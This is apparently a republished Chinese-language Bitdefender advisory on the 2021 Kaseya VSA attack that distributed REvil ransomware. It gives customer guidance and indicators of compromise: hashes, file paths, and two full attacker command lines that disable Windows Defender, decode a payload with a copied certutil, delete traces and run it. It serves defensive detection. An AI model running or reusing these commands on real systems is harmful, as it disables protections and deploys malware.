Bitdefender安全通告:黑客使用Kaseya IT管理软件来分发REvil勒索病毒

安全
2021年7月3日美国东部时间上午10:00,远程IT管理软件厂商Kaseya发布了紧急安全通告,Kaseya的VSA产品成为复杂网络攻击的受害者,攻击者正在使用Kaseya来分发REvil勒索病毒。

2021 年 7 月 3 日美国东部时间上午 10:00 ,远程IT管理软件厂商Kaseya发布了紧急安全通告,Kaseya 的 VSA 产品成为复杂网络攻击的受害者,攻击者正在使用Kaseya来分发REvil勒索病毒。

[[409321]]

Kasaya安全通告:

“我们继续强烈建议我们的本地客户的 VSA 服务器保持关闭状态,直至另行通知。我们还将保持 SaaS 服务器离线,直至另行通知。

我们的外部专家建议我们,遇到勒索软件并收到攻击者通信的客户不应点击任何链接——它们可能被武器化。”

公告原文:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender正在积极监控和分析使用 Kaseya 发动的高级攻击,Bitdefender迄今为止的调查结果表明,Bitdefender 解决方案可检测并阻止攻击中使用的命令行操作和交付的恶意payload,从而保护Bitdefender客户免受此次复杂的攻击。

由于这是一个不断变化的情况,我们将在可用时使用其他信息更新这篇文章。

Bitdefender 客户指南:

  • Kaseya 安全公告, 恳请其客户立即关闭本地 VSA 服务器。我们建议任何 Kaseya VSA 用户立即遵循此指南。
  • 检查本地和混合环境中的已知IoC指标 (IoC) - IoC 列表如下。
  • 美国网络安全和基础设施安全局 (CISA) 已 发布 警报 ,称他们正在监控有关针对 Kaseya VSA 和使用 VSA 软件的多个 MSP 的攻击的详细信息。我们建议组织遵循 CISA 警报以获取未来更新。

经过验证的IoC指标 :

1. 从 Kaseya 代理执行的命令行:

  1. C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

  1. C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

2. 哈希:

  • 561cffbaba71a6e8cc1cdceda990ead4,Bitdefender 在 2021 年 5 月 15 日已检测到,检测为 Gen:Variant.Graftor.952042。这是使用 certutil.exe 加密的主要可执行文件 ( c:\kworking\agent.exe)
  • a47cf00aedf769d60d58bfe00c0b5421,Bitdefender 在 2021 年 5 月13 日已检测到,检测为 Gen:Variant.Bulz.471680。这是一个由主可执行文件投递并使用 MS msmpeng.exe 可执行文件侧面加载的 DLL。
  • 0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的内容)。

3. 文件路径:

  • c:\WarCoMWorking\agent.crt
  • c:\WarCoMWorking\agent.exe
  • c:\kworking\agent.exe
  • c:\kworking\agent.crt

c:\windows\msmpeng.exe(较旧的版本,容易受到 DLL 侧加载的影响)。此版本被主要可执行文件投递,并进一步用于加载 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,Microsoft 恶意软件保护,4.5.0218.0

正在使用Bitdefender EDR的客户,可以使用IOC扫描功能,在全网中地毯式搜索IOC指标:

添加黑名单规则:在黑名单区域,可以添加上述IOC的哈希,全网阻断运行:

 

责任编辑:赵宁宁 来源: 至顶网
相关推荐

2021-07-06 14:22:50

勒索病毒

2021-07-08 15:51:26

Coop勒索软件攻击Kaseya

2021-07-06 13:55:32

REvil勒索软件漏洞

2021-09-17 13:27:09

勒索病毒

2017-06-28 02:25:23

2021-07-07 10:40:49

勒索软件攻击赎金

2021-06-22 19:56:13

勒索病毒

2017-07-05 11:23:38

勒索病毒网络安全企业数据

2021-04-24 09:39:26

勒索软件苹果威胁泄露

2017-05-13 15:20:51

2021-08-10 11:42:45

勒索软件网络攻击数据泄露

2009-04-02 13:49:58

Kaseya终端管理IT服务

2021-09-10 09:54:38

勒索软件REvil

2021-07-11 17:31:13

勒索软件攻击Kaseya

2020-05-22 09:40:51

勒索软件黑客暗网

2022-01-17 12:44:15

勒索软件REvil恶意软件

2021-09-14 14:55:17

REvil勒索软件网络攻击

2021-07-15 10:38:36

REvil勒索软件黑客

2021-07-05 18:50:22

供应链攻击勒索软件漏洞

2010-05-31 14:56:59

SVN版本管理软件
点赞
收藏

51CTO技术栈公众号